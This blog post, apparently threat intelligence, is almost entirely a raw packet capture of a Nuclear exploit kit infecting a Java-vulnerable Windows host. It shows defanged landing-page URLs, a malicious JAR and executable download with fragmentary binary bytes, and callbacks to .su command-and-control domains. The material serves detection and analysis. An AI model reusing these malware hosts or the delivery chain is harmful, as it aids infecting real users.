Nuclear Exploit Kit Exploiting Vulnerable Java – Installs Trojan Cidox.d Malware

By | June 18, 2015

2014-08-06 18:31:57.643670 IP 172.16.165.132.50043 > 94.229.64.227.80: Flags [S], seq 724820888, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@.@………^.@..{.P+3…….. ……………..
2014-08-06 18:31:57.770688 IP 94.229.64.227.80 > 172.16.165.132.50043: Flags [S.], seq 3911690002, ack 724820889, win 64240, options [mss 1460], length 0
E..,.w……^.@……P.{.’..+3..`…H………
2014-08-06 18:31:57.772299 IP 172.16.165.132.50043 > 94.229.64.227.80: Flags [.], ack 1, win 64240, length 0
E..(@.@………^.@..{.P+3…’..P…`………
2014-08-06 18:31:57.772538 IP 172.16.165.132.50043 > 94.229.64.227.80: Flags [P.], seq 1:370, ack 1, win 64240, length 369
E…@.@….a….^.@..{.P+3…’..P….@..GET /63c81e76vfy8.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ports.changeyourschools[.]com/p/h/d/0.32.2/external.min.js?ver=1.40.4319
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ibiz.counselingmoments[.]com
Connection: Keep-Alive

2014-08-06 18:31:57.772550 IP 94.229.64.227.80 > 172.16.165.132.50043: Flags [.], ack 370, win 64240, length 0
E..(.x……^.@……P.{.’..+3.
P…_A……..
2014-08-06 18:31:58.055483 IP 94.229.64.227.80 > 172.16.165.132.50043: Flags [.], seq 1:1461, ack 370, win 64240, length 1460
E….y…..E^.@……P.{.’..+3.
P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:02 GMT
Content-Type: text/html
Content-Length: 37497
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip

2014-08-06 18:32:08.158217 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [P.], seq 1:341, ack 1, win 64240, length 340
E..|@.@….]….^.@..|.PO…q..#P….
..GET /746074750/3/1407342360.jar HTTP/1.1
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: ibiz.counselingmoments[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-08-06 18:32:08.158231 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 341, win 64240, length 0
E..(……..^.@……P.|q..#O. .P…F………
2014-08-06 18:32:08.986350 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 1:1356, ack 341, win 64240, length 1355
E..s……..^.@……P.|q..#O. .P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:12 GMT
Content-Type: application/java
Content-Length: 12221
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=746074750.jar
Vary: User-Agent

PK……..<..E............ ...META-INF/......PK..............PK........<..E................META-INF/MANIFEST.MF.M..LK-...K-*....R0.3..r.JM,IM.u.. ......(h..%&..*8.....%...k.r.r..PK..[Z..C...D...PK........<..E................Adreno.class.T[S.@... a....R...)P..r...Z.ZD.-4kM-I'....|.E.,........F.v....wv.9.....?.|.0....bL.x..1!!).....I .$L).VqG.......}V........bI.....V.@......&a].#....yK../O`.#..)..f.h:.d..l'?/..h5r.,....E..:K......Cs,...Zu-......U><...yP$MH.1td}3.v.,.j..N.....d..].7^.J;....R..n...u[...by.q'.#.5\g.. .[w_L..`s. .1(aH.0...~j?....u.f_{..%.v..(Z9.2......O...D....1..lqlc.....Y..........$}r.c..9...j.+..X@h.JE.'W...r"|. ...<.b.ur&....x.....wL.<...$....A....,.E..4%.%N.(..}X....p..&-'D-... ...F1..r,.._3Db.F.@]..o...C=.........d3.. ...[C....q.f.M...`(...[O...&a.-..D...U..4B...jG~$..c.+.WgP3. .> .1.v.W.Q.%Zw..”\A……RB../.T…#zo….S….$.06h.4….Z..U”.. … N?.3..2……G. ..m+..{ h..y..0IY….J.}.ji…YB.d..?.PK..W..8……..PK……..<..E................Cibir.class.V[W.W......C..K/ZA..!@.A.)DP J..h.$3. a&N&..........zYUV..>..?..>….ja….f.}………;…1.F
2014-08-06 18:32:08.986664 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], seq 1356:2816, ack 341, win 64240, length 1460
E………..^.@……P.|q..nO. .P……..*.5..qA….q.7..T0. .$hA.-..2n+..D
KA..,…{A….sA.7..hBO….b.+0….Y..
L.9.k
.
2014-08-06 18:32:09.136907 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 12229:12491, ack 341, win 64240, length 262
E………..^.@……P.|q…O. .P………..Ristal.classPK……….<..E..m......... ............."...YY33.classPK..........<..Eq........... .............+...YY77.classPK..........<..EQ((&....k .. ..............$..Z1Z1.classPK..........<..E..6<..... .. ............. )..Z2Z2.classPK..........~...)-.... 2014-08-06 18:32:09.137116 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 12491, win 64240, length 0
E..(@.@………^.@..|.PO. .q…P….&……..
2014-08-06 18:32:09.191662 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [P.], seq 341:560, ack 12491, win 64240, length 219
E…@.@………^.@..|.PO. .q…P…….GET /f/3/1407342360/746074750/2 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: ibiz.counselingmoments[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-08-06 18:32:09.191675 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 560, win 64240, length 0
E..(……..^.@……P.|q…O. .P….K……..
2014-08-06 18:32:09.354657 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 12491:13846, ack 560, win 64240, length 1355
E..s…….r^.@……P.|q…O. .P…h…HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:13 GMT
Content-Type: application/octet-stream
Content-Length: 204800
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=2.exe
Vary: User-Agent

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……………………h0……h…….h……..=………H….h…….h4……h3…..Rich……………………….PE..L…#..S…………..
……\…….O…………@……………………..p…………@……………………………Xe………………………….0..<....................................Z..@...............P............................text............................... ..`.rdata..............................@..@.data............j...h..............@....rsrc...............................@..@.reloc..,1...0...2..................@..B.................................................................................................................................................................................................................................................................................................. 2014-08-06 18:32:10.844769 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 130409:131764, ack 560, win 64240, length 1355
E..s……..^.@……P.|q…O. .P….t..r. .i.n.f.o.r.m.a.t.i.o.n. .o.n. .h.o.w. .y.o.u.r. .p.r.o.g.r.a.m. .c.a.n. .c.a.u.s.e. .a.n. .a.s.s.e.r.t.i.o.n.
.f.a.i.l.u.r.e.,. .s.e.e. .t.h.e. .V.i.s.u.a.l. .C.+.+. .d.o.c.u.m.e.n.t.a.t.i.o.n. .o.n. .a.s.s.e.r.t.s…….m.e.m.c.p.y._.s.(.s.z.S.h.o.r.t.P.r.o.g.N.a.m.e.,. .s.i.z.e.o.f.(.T.C.H.A.R.). .*. .(.2.6.0. .-. .(.s.z.S.h.o.r.t.P.r.o.g.N.a.m.e. .-. .s.z.E.x.e.N.a.m.e.).).,. .d.o.t.d.o.t.d.o.t.,. .s.i.z.e.o.f.(.T.C.H.A.R.). .*. .3.)…..<.p.r.o.g.r.a.m. .n.a.m.e. .u.n.k.n.o.w.n.>…..w.c.s.c.p.y._.s.(.s.z.E.x.e.N.a.m.e.,. .2.6.0.,. .L.”.<.p.r.o.g.r.a.m. .n.a.m.e. .u.n.k.n.o.w.n.>.”.)…_._.c.r.t.M.e.s.s.a.g.e.W.i.n.d.o.w.W…csm…………….. ………..f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c.(.L.”.B.u.f.f.e.r. .i.s. .t.o.o. .s.m.a.l.l.”. .&.&. .0.)…B.u.f.f.e.r. .i.s. .t.o.o. .s.m.a.l.l…(.(.(._.S.r.c.).).). .!.=. .N.U.L.L…..s.t.r.c.p.y._.s…..f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.t.c.s.c.p.y._.s…i.n.l…(.(._.D.s.t.).). .!.=. .N.U.L.L. .&.&. .(.(._.S.i.z.e.I.n.B.y.t.e.s.).). .>. .0…..Client..Ignore..CRT.Normal..Free……A…A…A…A…A.Error: memory allocation: bad memory block type.
…Invalid allocation size: %Iu bytes.
….Client hook allocation failure.
….Client hook allocation failure at file %hs line %d.
……..f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\
2014-08-06 18:32:10.844887 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 131764, win 64240, length 0
E..(@.@………^.@..|.PO. .q…P…C`……..
2014-08-06 18:32:10.844961 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 131764:133119, ack 560, win 64240, length 1355
E..s……..^.@……P.|q…O. .P….0…s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.d.b.g.h.e.a.p…c….._.C.r.t.C.h.e.c.k.M.e.m.o.r.y.(.)…_.p.F.i.r.s.t.B.l.o.c.k. .=.=. .p.O.l.d.B.l.o.c.k…_.p.L.a.s.t.B.l.o.c.k. .=.=. .p.O.l.d.B.l.o.c.k…..f.R.e.a.l.l.o.c. .|.|. .(.!.f.R.e.a.l.l.o.c. .&.&. .p.N.e.w.B.l.o.c.k. .=.=. .p.O.l.d.B.l.o.c.k.)…Error: possible heap corruption at or near 0x%p…..p.O.l.d.B.l.o.c.k.-.>.n.L.i.n.e. .=.=. .I.G.N.O.R.E._.L.I.N.E. .&.&. .p.O.l.d.B.l.o.c.k.-.>.l.R.e.q.u.e.s.t. .=.=. .I.G.N.O.R.E._.R.E.Q………_.C.r.t.I.s.V.a.l.i.d.H.e.a.p.P.o.i.n.t.e.r.(.p.U.s.e.r.D.a.t.a.)…….The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()…..Error: memory allocation: bad memory block type.

Memory allocated at %hs(%d).
.Invalid allocation size: %Iu bytes.

Memory allocated at %hs(%d).
..Client hook re-allocation failure.
.Client hook re-allocation failure at file %hs line %d.
.p.U.s.e.r.D.a.t.a. .!.=. .N.U.L.L…_.p.F.i.r.s.t.B.l.o.c.k. .=.=. .p.H.e.a.d…_.p.L.a.s.t.B.l.o.c.k. .=.=. .p.H.e.a.d…..p.H.e.a.d.-.>.n.B.l.o.c.k.U.s.e. .=.=. .n.B.l.o.c.k.U.s.e…p.H.e.a.d.-.>.n.L.i.n.e. .=.=. .I.G.N.O.R.E._.L.I.N.E. .&.&. .p.H.e.a.d.-.>.l.R.e.q.u.e.s.t. .=.=. .I.G.N.O.R.E._.R.E.Q………HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
…HEAP CORRUPTION DETECT
2014-08-06 18:32:10.848998 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 133119:134474, ack 560, win 64240, length 1355
E..s……..^.@……P.|q..!O. .P….P..ED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.

Memory allocated at %hs(%d).
…..HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
…….HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.

Memory allocated at %hs(%d).
.Client hook free failure.
……The Block at 0x%p was allocated by aligned routines, use _aligned_free()…._.m.s.i.z.e._.d.b.g…..%hs located at 0x%p is %Iu bytes long.
…..%hs located at 0x%p is %Iu bytes long.

Memory allocated at %hs(%d).
…HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.
…….HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.

Memory allocated at %hs(%d).
.DAMAGED._heapchk fails with unknown return value!
.._heapchk fails with _HEAPBADPTR.
…_heapchk fails with _HEAPBADEND.
…_heapchk fails with _HEAPBADNODE.
.._heapchk fails with _HEAPBADBEGIN.
._.C.r.t.S.e.t.D.b.g.F.l.a.g………(.f.N.e.w.B.i.t.s.=.=._.C.R.T.D.B.G._.R.E.P.O.R.T._.F.L.A.G.). .|.|. .(.(.f.N.e.w.B.i.t.s. .&. .0.x.0.f.f.f.f. .&. .~.(._
2014-08-06 18:32:10.849049 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 134474, win 64240, length 0
E..(@.@….~….^.@..|.PO. .q..lP…8………
2014-08-06 18:32:10.849218 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 134474:135829, ack 560, win 64240, length 1355
E..s……..^.@……P.|q..lO. .P…D….C.R.T.D.B.G._.A.L.L.O.C._.M.E.M._.D.F. .|. ._.C.R.T.D.B.G._.D.E.L.A.Y._.F.R.E.E._.M.E.M._.D.F. .|. ._.C.R.T.D.B.G._.C.H.E.C.K._.A.L.W.A.Y.S._.D.F. .|. ._.C.R.T.D.B.G._.C.H.E.C.K._.C.R.T._.D.F. .|. ._.C.R.T.D.B.G._.L.E.A.K._.C.H.E.C.K._.D.F.). .). .=.=. .0.)…..Bad memory block found at 0x%p.
….Bad memory block found at 0x%p.
2014-08-06 18:32:10.970006 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 143959:145314, ack 560, win 64240, length 1355
E..s……..^.@……P.|q. yO. .P…….n.B.y.t.e.s. .>.=. .c.o.u.n.t…..s.r.c. .!.=. .N.U.L.L…m.e.m.c.p.y._.s………f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.m.e.m.c.p.y._.s…c…d.s.t. .!.=. .N.U.L.L…w.c.s.c.p.y._.s…..(.(._.D.s.t.).). .!.=. .N.U.L.L. .&.&. .(.(._.S.i.z.e.I.n.W.o.r.d.s.).). .>. .0………Assertion Failed….Error…Warning…B…B…B.Microsoft Visual C++ Debug Library……Debug %s!

Program: %s%s%s%s%s%s%s%s%s%s%s%s

(Press Retry to debug the application)….
Module: …
File: .
Line: .

..Expression: ….

For information on how your program can cause an assertion
failure, see the Visual C++ documentation on asserts………s.t.r.c.p.y._.s.(.s.z.E.x.e.N.a.m.e.,. .2.6.0.,. .”.<.p.r.o.g.r.a.m. .n.a.m.e. .u.n.k.n.o.w.n.>.”.)….._._.c.r.t.M.e.s.s.a.g.e.W.i.n.d.o.w.A…_.e.x.p.a.n.d._.b.a.s.e………f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.e.x.p.a.n.d…c…p.B.l.o.c.k. .!.=. .N.U.L.L…..f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.l.o.c.a.l.r.e.f…c…….(.(.p.t.l.o.c.i.-.>.l.c._.c.a.t.e.g.o.r.y.[.c.a.t.e.g.o.r.y.]…w.l.o.c.a.l.e. .!.=. .N.U.L.L.). .&.&. .(.p.t.l.o.c.i.-.>.l.c._.c.a.t.e.g.o.r.y.[.c.a.t.e.g.o.r.y.]…w.r.e.f.c.o.u.n.t. .!.=. .N.U.L.L.).). .|.|. .(.(.p.t.l.o.c.i.-.>.l.c._.c.a.t.e.g.o.r.y.[.c.a.t.e.g
2014-08-06 18:32:10.970729 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 145314, win 64240, length 0
E..(@.@….z….^.@..|.PO. .q.%.P….r……..
2014-08-06 18:32:10.970821 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 145314:146669, ack 560, win 64240, length 1355
E..s……..^.@……P.|q.%.O. .P….f…o.r.y.]…w.l.o.c.a.l.e. .=.=. .N.U.L.L.). .&.&. .(.p.t.l.o.c.i.-.>.l.c._.c.a.t.e.g.o.r.y.[.c.a.t.e.g.o.r.y.]…w.r.e.f.c.o.u.n.t. .=.=. .N.U.L.L.).)…..H.H.:.m.m.:.s.s…..d.d.d.d.,. .M.M.M.M. .d.d.,. .y.y.y.y…M.M./.d.d./.y.y…..P.M…..A.M…..D.e.c.e.m.b.e.r…..N.o.v.e.m.b.e.r…..O.c.t.o.b.e.r…S.e.p.t.e.m.b.e.r…A.u.g.u.s.t…..J.u.l.y…..J.u.n.e…..A.p.r.i.l…M.a.r.c.h…F.e.b.r.u.a.r.y…..J.a.n.u.a.r.y…D.e.c…N.o.v…O.c.t…S.e.p…A.u.g…J.u.l…J.u.n…M.a.y…A.p.r…M.a.r…F.e.b…J.a.n…S.a.t.u.r.d.a.y…..F.r.i.d.a.y…..T.h.u.r.s.d.a.y…..W.e.d.n.e.s.d.a.y…T.u.e.s.d.a.y…M.o.n.d.a.y…..S.u.n.d.a.y…..S.a.t…F.r.i…T.h.u…W.e.d…T.u.e…M.o.n…S.u.n…HH:mm:ss….dddd, MMMM dd, yyyy.MM/dd/yy….PM..AM..December….November….October.September…August..July….June….April…March…February….January.Dec.Nov.Oct.Sep.Aug.Jul.Jun.May.Apr.Mar.Feb.Jan.Saturday….Friday..Thursday….Wednesday…Tuesday.Monday.[.]sunday..Sat.Fri.Thu.Wed.Tue.Mon[.]sun…..f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.i.s.c.t.y.p.e…c…..(.u.n.s.i.g.n.e.d.).(.c. .+. .1.). .<.=. .2.5.6....._.i.s.a.t.t.y...f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.i.s.a.t.t.y...c...(.f.h. .>.=. .0. .&.&. .(.u.n.s.i.g.n.e.d.).f.h. .<. .(.u.n.s.i.g.n.e.d.)._.n.h.a.n. 2014-08-06 18:32:10.971037 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 146669:148024, ack 560, win 64240, length 1355
E..s……..^.@……P.|q.+.O. .P…!7..d.l.e.)….._.f.i.l.e.n.o…f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.f.i.l.e.n.o…c…(.”.B.u.f.f.e.r. .t.o.o. .s.m.a.l.l.”.,. .0.)…s.i.z.e.I.n.B.y.t.e.s. .>. .0…_.w.c.t.o.m.b._.s._.l…f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\.w.c.t.o.m.b…c…s.i.z.e.I.n.B.y.t.e.s. .<.=. .I.N.T._.M.A.X.....(.".i.n.c.o.n.s.i.s.t.e.n.t. .I.O.B. .f.i.e.l.d.s.".,. .s.t.r.e.a.m.-.>._.p.t.r. .-. .s.t.r.e.a.m.-.>._.b.a.s.e. .>.=. .0.)…..f.:.\.d.d.\.v.c.t.o.o.l.s.\.c.r.t._.b.l.d.\.s.e.l.f._.x.8.6.\.c.r.t.\.s.r.c.\._.f.l.s.b.u.f…c……………………….EEE……00.P…..(‘8PW….700PP…. (…….`h`hhh…xppwpp……………..(.(.s.t.a.t.e. .=.=. .S.T._.N.O.R.M.A.L.). .|.|. .(.s.t.a.t.e. .=.=. .S.T._.T.Y.P.E.).)………(.”.I.n.c.o.r.r.e.c.t. .f.o.r.m.a.t. .s.p.e.c.i.f.i.e.r.”.,. .0.)…_.o.u.t.p.u.t._.s._.l… Complete Object Locator’… Class Hierarchy Descriptor’…. Base Class Array’.. Base Class Descriptor at (. Type Descriptor’…`local static thread guard’.`managed vector copy constructor iterator’..`vector vbase copy constructor iterator’….`vector copy constructor iterator’..`dynamic atexit destructor for ‘….`dynamic initializer for ‘..`eh vector vbase copy constructor iterator’.`eh vector copy constructor iterator’…`managed vector destructor iterator’…
2014-08-06 18:32:10.971118 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 148024, win 64240, length 0
2014-08-06 18:32:11.650639 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [P.], seq 560:781, ack 217561, win 64240, length 221
E…A.@………^.@..|.PO. .q.?.P…3…GET /f/3/1407342360/746074750/2/2 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: ibiz.counselingmoments[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-08-06 18:32:11.650707 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 781, win 64240, length 0
E..(.P…..”^.@……P.|q.?.O.
.P….\……..
2014-08-06 18:32:12.046049 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 217561:217826, ack 781, win 64240, length 265
E..1.R……^.@……P.|q.?.O.
.P….}..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:16 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=2.exe
Vary: User-Agent

2014-08-06 18:32:12.146510 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 217561:217826, ack 781, win 64240, length 265
E..1.S……^.@……P.|q.?.O.
.P….}..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:16 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=2.exe
Vary: User-Agent

2014-08-06 18:32:12.148449 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 217826, win 63975, length 0
E..(A.@….^….^.@..|.PO.
.q.A.P….\……..
2014-08-06 18:32:12.578137 IP 172.16.165.132.62833 > 172.16.165.2.53: 50026+ A? icepower[.]su. (29)
E..9A…..V……….q.5.%g..j………..icepower[.]su…..
2014-08-06 18:32:12.975937 IP 172.16.165.2.53 > 172.16.165.132.62833: 50026 10/0/0 A 31.202.203.170, A 173.95.149.72, A 93.77.75.2, A 109.104.188.118, A 213.111.176.60, A 46.109.158.122, A 46.173.98.20, A 96.239.101.14, A 50.83.36.2, A 176.120.47.28 (189)
E….U……………5.q..n..j…..
…..icepower[.]su……………………………._.H…………]MK………….mh.v………….o.<.............m.z..............b.............`.e.............2S$..............x/. 2014-08-06 18:32:14.255950 IP 172.16.165.132.50045 > 31.202.203.170.80: Flags [P.], seq 1:289, ack 1, win 64240, length 288
E..HA.@…{……….}.P..pK..0.P…-@..GET /b/shoe/1480 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: icepower[.]su
Cache-Control: no-cache

2014-08-06 18:32:14.255954 IP 31.202.203.170.80 > 172.16.165.132.50045: Flags [.], ack 289, win 64240, length 0
E..(.W….No………P.}..0…qkP….(……..
2014-08-06 18:32:19.144348 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [F.], seq 781, ack 217826, win 63975, length 0
E..(A.@….U….^.@..|.PO.
.q.A.P….[……..
2014-08-06 18:32:19.144363 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 782, win 64239, length 0
E..(.X……^.@……P.|q.A.O.
.P….S……..
2014-08-06 18:32:19.266036 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 217827, win 63975, length 0
E..(A.@….T….^.@..|.PO.
.q.A.P….Z……..
2014-08-06 18:32:22.677976 IP 31.202.203.170.80 > 172.16.165.132.50045: Flags [P.], seq 1:149, ack 289, win 64240, length 148
E….Z….M……….P.}..0…qkP…9F..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:23 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close

2014-08-06 18:32:22.678119 IP 172.16.165.132.50045 > 31.202.203.170.80: Flags [F.], seq 289, ack 149, win 64092, length 0
E..(A.@…|……….}.P..qk..1BP..\.’……..
2014-08-06 18:32:22.678132 IP 31.202.203.170.80 > 172.16.165.132.50045: Flags [.], ack 290, win 64239, length 0
E..(.[….Nk………P.}..1B..qlP………….
2014-08-06 18:32:22.680336 IP 172.16.165.132.50944 > 172.16.165.2.53: 59731+ A? smokejuse[.]su. (30)
E..:A ….V…………5.&s..S………. smokejuse[.]su…..
2014-08-06 18:32:22.691952 IP 172.16.165.132.50045 > 31.202.203.170.80: Flags [.], ack 150, win 64092, length 0
E..(A!@…|……….}.P..ql..1CP..\.&……..
2014-08-06 18:32:22.719525 IP 172.16.165.2.53 > 172.16.165.132.50944: 59731 10/0/0 A 37.229.104.171, A 37.115.65.28, A 176.73.87.120, A 5.248.202.100, A 188.230.15.191, A 46.119.185.140, A 176.113.239.177, A 68.45.64.5, A 109.206.56.144, A 46.173.71.207 (190)
E….]……………5…….S…..
…. smokejuse[.]su……………..%.h………….%sA…………..IWx……………d………………………..w……………q…………..D-@………….m.8……………G.
2014-08-06 18:32:22.719914 IP 172.16.165.132.50046 > 37.229.104.171.80: Flags [S], seq 4148697549, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4A”@….|….%.h..~.P.H…….. ……………..
2014-08-06 18:32:22.936850 IP 37.229.104.171.80 > 172.16.165.132.50046: Flags [S.], seq 1590788489, ack 4148697550, win 64240, options [mss 1460], length 0
E..,.^…..H%.h……P.~^….H..`………….
2014-08-06 18:32:22.936920 IP 172.16.165.132.50046 > 37.229.104.171.80: Flags [.], ack 1, win 64240, length 0
E..(A#@………%.h..~.P.H..^…P….}……..
2014-08-06 18:32:22.937076 IP 172.16.165.132.50046 > 37.229.104.171.80: Flags [P.], seq 1:306, ack 1, win 64240, length 305
E..YA$@….U….%.h..~.P.H..^…P…”Y..GET /mod_articles-rd4g89/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: smokejuse[.]su
Cache-Control: no-cache

2014-08-06 18:32:22.937168 IP 37.229.104.171.80 > 172.16.165.132.50046: Flags [.], ack 306, win 64240, length 0
E..(._…..K%.h……P.~^….H..P….L……..
2014-08-06 18:32:23.942536 IP 37.229.104.171.80 > 172.16.165.132.50046: Flags [P.], seq 1:1356, ack 306, win 64240, length 1355
E..s.b……%.h……P.~^….H..P…(…HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:31:39 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache
2014-08-06 18:33:16.185950 IP 172.16.165.132.62197 > 172.16.165.2.53: 1384+ A? vision-vaper[.]su. (33)
E..=…….z………..5.)G..h………..vision-vaper[.]su…..
2014-08-06 18:33:16.217743 IP 172.16.165.2.53 > 172.16.165.132.62197: 1384 10/0/0 A 176.120.47.28, A 31.202.203.170, A 173.95.149.72, A 93.77.75.2, A 109.104.188.118, A 213.111.176.60, A 46.109.158.122, A 46.173.98.20, A 96.239.101.14, A 50.83.36.2 (193)
E….3…..4………5….Np.h…..
…..vision-vaper[.]su………………x/…………………………_.H…………]MK………….mh.v………….o.<.............m.z..............b.............`.e.............2S$. 2014-08-06 18:33:16.219070 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [S], seq 2158736076, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……….x/….P………. .*……………
2014-08-06 18:33:16.219257 IP 172.16.165.132.49159 > 176.120.47.28.80: Flags [S], seq 4212457540, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….
…..x/….P…D…… .b5…………..
2014-08-06 18:33:16.400024 IP 176.120.47.28.80 > 172.16.165.132.49158: Flags [S.], seq 1728376890, ack 2158736077, win 64240, options [mss 1460], length 0
E..,.4….Xn.x/……P..g..:….`… ………
2014-08-06 18:33:16.400147 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [.], ack 1, win 64240, length 0
E..(..@……….x/….P….g..;P…8………
2014-08-06 18:33:16.400496 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [P.], seq 1:337, ack 1, win 64240, length 336
E..x..@……….x/….P….g..;P….^..GET /b/eve/7a5684aab544793d37f05a96 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://www.google[.]com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: vision-vaper[.]su
Connection: Keep-Alive

